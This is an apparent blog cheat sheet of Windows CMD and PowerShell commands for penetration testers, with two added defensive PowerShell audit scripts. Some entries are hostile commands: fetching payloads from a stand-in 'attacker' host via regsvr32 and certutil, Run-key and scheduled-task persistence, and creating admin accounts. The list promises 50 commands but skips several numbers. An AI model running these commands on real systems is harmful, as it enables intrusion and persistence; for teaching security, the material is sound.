Windows commands are essential tools for penetration testers and red team operators. Proficiency with these commands empowers effective reconnaissance, exploitation, privilege escalation, and more. In this comprehensive guide, we delve into the 50 most vital Windows commands, providing detailed explanations, command usage examples, and invaluable insights tailored for penetration testers and red team operators.
1. dir – List Files and Directories
The dir command is a fundamental tool for reconnaissance on Windows systems:
CMD Usage:
C:\> dir # List files and directories
C:\> dir /s # List files and directories recursively
PowerShell Usage:
PS C:\> Get-ChildItem # List files and directories
PS C:\> Get-ChildItem -Recurse # List files and directories recursively
Tip: Combine with findstr in CMD or Select-String in PowerShell to search for specific filenames or keywords.
2. cd – Change Directory
Navigating directories is essential for accessing target-specific files or locations:
CMD Usage:
C:\> cd Documents # Change to "Documents" directory
PowerShell Usage:
PS C:\> Set-Location Documents # Change to "Documents" directory
Tip: Quickly switch to directories containing sensitive data or configuration files.
3. echo – Display Text or Enable/Disable Command Echo
The echo command outputs text to the command prompt or can control command echoing:
CMD Usage:
C:\> echo Hello, world! # Display text
PowerShell Usage:
PS C:\> Write-Output "Hello, world!" # Display text
Tip: Utilize echo in batch files or Write-Output in PowerShell scripts.
4. mkdir – Create Directory
Creating directories is essential for organizing your tools, scripts, and findings:
CMD Usage:
C:\> mkdir Reports # Create "Reports" directory
PowerShell Usage:
PS C:\> New-Item -ItemType Directory -Name Reports # Create "Reports" directory
Tip: Organize your toolkit by creating folders for specific tasks or projects.
5. copy – Copy Files and Directories
Copying files and directories aids in preserving evidence or deploying payloads:
CMD Usage:
C:\> copy file.txt dir\ # Copy file.txt to dir\
PowerShell Usage:
PS C:\> Copy-Item file.txt dir\ # Copy file.txt to dir\
Tip: Copy malicious files or tools to target systems for exploitation.
6. move – Move and Rename Files
Moving or renaming files is helpful for concealing your actions or modifying system behavior:
CMD Usage:
C:\> move file.txt newdir\ # Move file.txt to newdir\
PowerShell Usage:
PS C:\> Move-Item file.txt newdir\ # Move file.txt to newdir\
Tip: Rename or move files to evade detection or manipulate system behavior.
7. del – Delete Files
Deleting files is essential for covering your tracks or removing evidence:
CMD Usage:
C:\> del file.txt # Delete file.txt
PowerShell Usage:
PS C:\> Remove-Item file.txt # Delete file.txt
Tip: Use with caution as this command permanently removes files.
8. type – Display File Contents
Displaying file contents helps understand system configurations and identify vulnerabilities:
CMD Usage:
C:\> type file.txt
PowerShell Usage:
PS C:\> Get-Content file.txt
Tip: Examine configuration files to uncover sensitive information or vulnerabilities.
9. notepad – Open Text Files with Notepad
Opening files with Notepad allows quick examination or modification of contents:
CMD Usage:
C:\> notepad file.txt
PowerShell Usage:
PS C:\> notepad file.txt
Tip: Quickly edit configuration files or analyze logs with Notepad.
10. findstr – Search for Strings in Files
Searching for text patterns is essential for identifying vulnerabilities or sensitive data:
CMD Usage:
C:\> type file.txt | findstr "pattern"
PowerShell Usage:
PS C:\> Get-Content file.txt | Select-String "pattern"
Tip: Uncover vulnerabilities by searching for keywords in configuration files or source code.
11. tasklist – List Running Processes
Listing processes aids in identifying active applications and potential attack vectors:
CMD Usage:
C:\> tasklist # List running processes
PowerShell Usage:
PS C:\> Get-Process # List running processes
Tip: Detect suspicious processes or unauthorized applications.
12. taskkill – Terminate Processes
Terminating processes is vital for stopping unwanted or malicious applications:
CMD Usage:
C:\> taskkill /im process.exe /f # Terminate a process by image name
PowerShell Usage:
PS C:\> Stop-Process -Name process -Force # Terminate a process by name (Stop-Process -Name takes the image name without the .exe extension)
Tip: Halt malicious processes or applications that pose a threat.
13. netstat – Display Network Statistics
Monitoring network connections helps identify open ports and network activities:
CMD Usage:
C:\> netstat -ano # Display active network connections
PowerShell Usage:
PS C:\> Get-NetTCPConnection # Display active network connections
Tip: Identify active connections and potential attack vectors.
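As an added example (not part of the original article), the following PowerShell joins each TCP connection to its owning process, so an unexpected remote endpoint can be traced to a binary on disk; it assumes the NetTCPIP module (Windows 8 / Server 2012 or later) and an elevated prompt for full process path visibility.

```powershell
# Added example (not from the original article): attribute every TCP connection
# to the process that owns it, the manual step behind "netstat -ano" + "tasklist".
# Assumes Get-NetTCPConnection is available and the shell is elevated so that
# Path is populated for processes owned by other users.
function Get-ConnectionOwner {
    param(
        # Include listening sockets as well as established sessions
        [switch]$IncludeListening
    )
    $states = @('Established')
    if ($IncludeListening) { $states += 'Listen' }

    # Cache the process table once instead of calling Get-Process per connection
    $procs = @{}
    Get-Process | ForEach-Object { $procs[$_.Id] = $_ }

    Get-NetTCPConnection -State $states -ErrorAction SilentlyContinue |
        ForEach-Object {
            $p = $procs[[int]$_.OwningProcess]
            [pscustomobject]@{
                LocalAddress  = $_.LocalAddress
                LocalPort     = $_.LocalPort
                RemoteAddress = $_.RemoteAddress
                RemotePort    = $_.RemotePort
                State         = $_.State
                PID           = $_.OwningProcess
                Process       = if ($p) { $p.ProcessName } else { '<exited or protected>' }
                # Path is $null for protected/system processes without elevation
                Path          = if ($p) { $p.Path } else { $null }
            }
        }
}

# Typical triage question: which processes talk to addresses outside
# RFC 1918 space and loopback? (Listen-state placeholders are excluded too.)
$private = '^(10\.|192\.168\.|172\.(1[6-9]|2\d|3[01])\.|127\.|::1$|::$|0\.0\.0\.0$)'
Get-ConnectionOwner |
    Where-Object { $_.RemoteAddress -notmatch $private } |
    Sort-Object Process, RemoteAddress |
    Format-Table -AutoSize
```

A process without a Path in the output is either a protected system process or one the current token cannot inspect; re-run elevated before treating that as suspicious.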
14. ipconfig – Display IP Configuration
Viewing IP configuration aids in understanding network settings and potential vulnerabilities:
CMD Usage:
C:\> ipconfig # Display IP configuration
PowerShell Usage:
PS C:\> Get-NetIPAddress # Display IP configuration
Tip: Identify IP addresses, network interfaces, and DNS configurations.
15. ping – Test Network Connectivity
Testing network connectivity helps identify live hosts and assess network latency:
CMD Usage:
C:\> ping google.com
PowerShell Usage:
PS C:\> Test-Connection google.com
Tip: Determine if a target is reachable and assess network responsiveness.
16. nslookup – DNS Lookup
Performing DNS lookups is useful for resolving hostnames or IP addresses:
CMD Usage:
C:\> nslookup google.com
PowerShell Usage:
PS C:\> Resolve-DnsName google.com
Tip: Gather information about target systems through DNS records.
17. wmic – Windows Management Instrumentation Command-line
Interacting with Windows Management Instrumentation helps gather system information:
CMD Usage:
C:\> wmic process list brief
PowerShell Usage:
PS C:\> Get-CimInstance Win32_Process # List processes (Get-WmiObject Win32_Process also works in Windows PowerShell but is deprecated and absent from PowerShell 7)
Tip: Collect information about processes, services, and hardware configurations.
18. systeminfo – Display System Information
Viewing system information provides insights into the operating system and hardware:
CMD Usage:
C:\> systeminfo
PowerShell Usage:
PS C:\> Get-ComputerInfo
Tip: Gather details about the system, OS version, and installed updates.
19. reg query – Query Registry Information
Interacting with the Windows Registry assists in gathering system configuration details:
CMD Usage:
C:\> reg query HKLM\Software\Microsoft\Windows\CurrentVersion /v ProductName
PowerShell Usage:
PS C:\> Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion" -Name "ProductName"
Tip: Extract information from the registry, such as installed software or settings.
20. reg add and reg delete – Modify Registry Entries
Modifying registry entries aids in altering system configurations or disabling security settings:
CMD Usage:
C:\> reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Malware" /t REG_SZ /d "C:\malware.exe"
PowerShell Usage:
PS C:\> Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Malware" -Value "C:\malware.exe"
Tip: Modify startup entries for persistence or disable security mechanisms.
21. net user – Manage User Accounts
Managing user accounts is crucial for privilege escalation and lateral movement:
CMD Usage:
C:\> net user newuser newpassword /add # Add a new user
PowerShell Usage:
PS C:\> New-LocalUser -Name newuser -Password (ConvertTo-SecureString -String "newpassword" -AsPlainText -Force) -AccountNeverExpires
Tip: Exploit weak user accounts or escalate privileges by creating new users.
22. net localgroup – Manage Local Groups
Managing local groups is essential for privilege escalation and controlling system access:
CMD Usage:
C:\> net localgroup Administrators newuser /add # Add user to Administrators group
PowerShell Usage:
PS C:\> Add-LocalGroupMember -Group "Administrators" -Member "newuser"
Tip: Escalate privileges by adding users to high-privileged groups.
23. net share – Manage Shared Resources
Managing shared resources helps identify vulnerabilities or lateral movement opportunities:
CMD Usage:
C:\> net share # List shared resources
PowerShell Usage:
PS C:\> Get-SmbShare # List shared resources
Tip: Identify exposed file shares for potential exploitation.
24. net use – Connect to Shared Resources
Connecting to shared resources assists in lateral movement and data exfiltration:
CMD Usage:
C:\> net use \\target\share /user:username password
PowerShell Usage:
PS C:\> New-SmbMapping -LocalPath "Z:" -RemotePath "\\target\share" -UserName username -Password "password" # -Password takes a plain string, not a SecureString
Tip: Map network drives for easy access to shared resources.
26. route – Display or Modify Network Routing
Displaying or modifying network routing is useful for pivoting or network manipulation:
CMD Usage:
C:\> route print # Display routing table
PowerShell Usage:
PS C:\> Get-NetRoute # Display routing table
Tip: Modify network routing to redirect traffic for exploitation.
27. netsh – Network Shell
Interacting with network settings and configurations helps manipulate network behavior:
CMD Usage:
C:\> netsh wlan show profiles # Display Wi-Fi profiles
PowerShell Usage:
PS C:\> Get-NetConnectionProfile # Display network connection profiles (Public/Private/Domain per interface); saved Wi-Fi profiles are only listed by netsh wlan
Tip: Manipulate firewall rules or discover saved Wi-Fi passwords.
28. whoami – Display User and Group Information
Displaying user and group information helps understand available privileges:
CMD Usage:
C:\> whoami
PowerShell Usage:
PS C:\> whoami /groups
Tip: Determine your user context and associated groups for privilege analysis.
30. driverquery – Display Installed Device Drivers
Listing installed device drivers aids in identifying potential vulnerabilities:
CMD Usage:
C:\> driverquery
PowerShell Usage:
PS C:\> Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion
Tip: Identify outdated or vulnerable device drivers for exploitation.
31. sc – Service Control
Interacting with Windows services helps control system behavior and persistence:
CMD Usage:
C:\> sc query # List all services
PowerShell Usage:
PS C:\> Get-Service # List all services
Tip: Disable or modify services for persistence or to disable security mechanisms.
32. schtasks – Schedule Tasks
Scheduling tasks aids in persistence and automated exploitation:
CMD Usage:
C:\> schtasks /create /tn "MyTask" /tr "malicious.exe" /sc daily /st 00:00
PowerShell Usage:
PS C:\> Register-ScheduledTask -TaskName "MyTask" -Action (New-ScheduledTaskAction -Execute "malicious.exe") -Trigger (New-ScheduledTaskTrigger -Daily -At 00:00)
Tip: Schedule malicious payloads or backdoors for automated execution.
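As an added example (not part of the original article) covering the two persistence locations in entries 20 and 32, this PowerShell enumerates the Run/RunOnce keys and all scheduled-task exec actions and flags entries whose executable sits outside the system and program directories; the trusted-root list is an illustrative assumption, and the ScheduledTasks module (Windows 8 / Server 2012 or later) is required.

```powershell
# Added example (not from the original article): audit the Run keys and scheduled
# tasks described above, flagging entries whose binary sits outside the usual
# system/program directories. The trusted-root list is an illustrative assumption.
$trustedRoots = @($env:SystemRoot, $env:ProgramFiles, ${env:ProgramFiles(x86)},
                  "$env:ProgramData\Microsoft") | Where-Object { $_ }

function Test-TrustedPath {
    param([string]$Command)
    if (-not $Command) { return $false }
    # Extract the executable from a command line such as "C:\dir\app.exe" /arg
    $exe = if ($Command -match '^\s*"([^"]+)"') { $Matches[1] } else { ($Command -split '\s+')[0] }
    $exe = [Environment]::ExpandEnvironmentVariables($exe)
    foreach ($root in $trustedRoots) {
        # Trailing backslash so C:\Windows does not also match C:\WindowsApps
        if ($exe.StartsWith($root.TrimEnd('\') + '\', [StringComparison]::OrdinalIgnoreCase)) { return $true }
    }
    return $false
}

$findings = @()

# 1. Run / RunOnce keys for the machine and the current user
$runKeys = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
           'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
           'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
           'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    $props = Get-ItemProperty -Path $key
    foreach ($name in $props.PSObject.Properties.Name) {
        if ($name -like 'PS*') { continue }   # skip PSPath, PSParentPath, ...
        $cmd = $props.$name
        if (-not (Test-TrustedPath $cmd)) {
            $findings += [pscustomobject]@{ Source = $key; Name = $name; Command = $cmd }
        }
    }
}

# 2. Scheduled tasks whose exec action runs from an untrusted location
foreach ($task in Get-ScheduledTask) {
    foreach ($action in $task.Actions) {
        # COM-handler actions have no Execute property; $null skips them
        if ($action.Execute -and -not (Test-TrustedPath $action.Execute)) {
            $findings += [pscustomobject]@{
                Source  = "Task $($task.TaskPath)$($task.TaskName)"
                Name    = $task.Principal.UserId
                Command = "$($action.Execute) $($action.Arguments)".Trim()
            }
        }
    }
}

$findings | Format-Table -AutoSize -Wrap
```

Bare executable names without a directory (resolved through PATH at run time) are also flagged, since they can be hijacked by placing a same-named binary earlier in the search order; review those entries rather than dismissing them.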
33. regsvr32 – Register and Unregister DLLs
Registering or unregistering DLLs can aid in executing malicious code or maintaining persistence:
CMD Usage:
C:\> regsvr32 /s /i:http://attacker/evil.sct scrobj.dll # Register with remote content
PowerShell Usage:
PS C:\> rundll32.exe malicious.dll,EntryPoint
Tip: Exploit DLL hijacking vulnerabilities or execute malicious scripts.
34. cipher – Manage File Encryption
Managing file encryption helps protect sensitive data or manipulate encrypted files:
CMD Usage:
C:\> cipher /e /a filename.txt # Encrypt file with EFS (/a makes cipher operate on files as well as directories)
PowerShell Usage:
PS C:\> Protect-CmsMessage -To "cn=recipient@example.com" -Content "This is a secret message" -OutFile encryptedMessage.txt # -To accepts a certificate, its file path, thumbprint or subject name; the content is encrypted to that certificate's public key
Tip: Encrypt files for data exfiltration or manipulate encrypted data.
37. powercfg – Power Configuration
Interacting with power configurations can assist in controlling system behavior and persistence:
CMD Usage:
C:\> powercfg /hibernate off # Disable hibernation
PowerShell Usage:
PS C:\> Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Power" -Name "HibernateEnabled" -Value 0
Tip: Manipulate power settings for system manipulation or preservation.
39. msfconsole – Metasploit Framework Console
Using Metasploit aids in exploiting vulnerabilities and conducting penetration tests:
CMD and PowerShell Usage:
C:\> msfconsole
Tip: Exploit known vulnerabilities using Metasploit’s extensive collection of modules.
40. certutil – File Utility for Downloading and Displaying Files
Interacting with certificates aids in downloading files or executing malicious payloads:
CMD Usage:
C:\> certutil -urlcache -f http://attacker/malicious.exe C:\malicious.exe
PowerShell Usage:
PS C:\> Invoke-WebRequest -Uri http://attacker/malicious.exe -OutFile C:\malicious.exe
Tip: Download malicious files for exploitation or lateral movement.
41. nmap – Network Mapping and Port Scanning
Using Nmap assists in network reconnaissance and identifying potential attack vectors:
CMD and PowerShell Usage:
C:\> nmap -sV -p 1-1000 target
Tip: Identify open ports and services on target systems for exploitation.
Mastering these 50 Windows commands is a crucial step toward becoming a skilled penetration tester or red team operator. By honing your skills with these tools, you’ll be well-equipped to navigate a variety of scenarios, from reconnaissance to exploitation and beyond. As you continually refine your abilities, delve into more advanced Windows concepts and expand your toolkit, you’ll develop the expertise needed to excel in the dynamic field of cybersecurity. Best of luck in your journey of penetration testing and red teaming!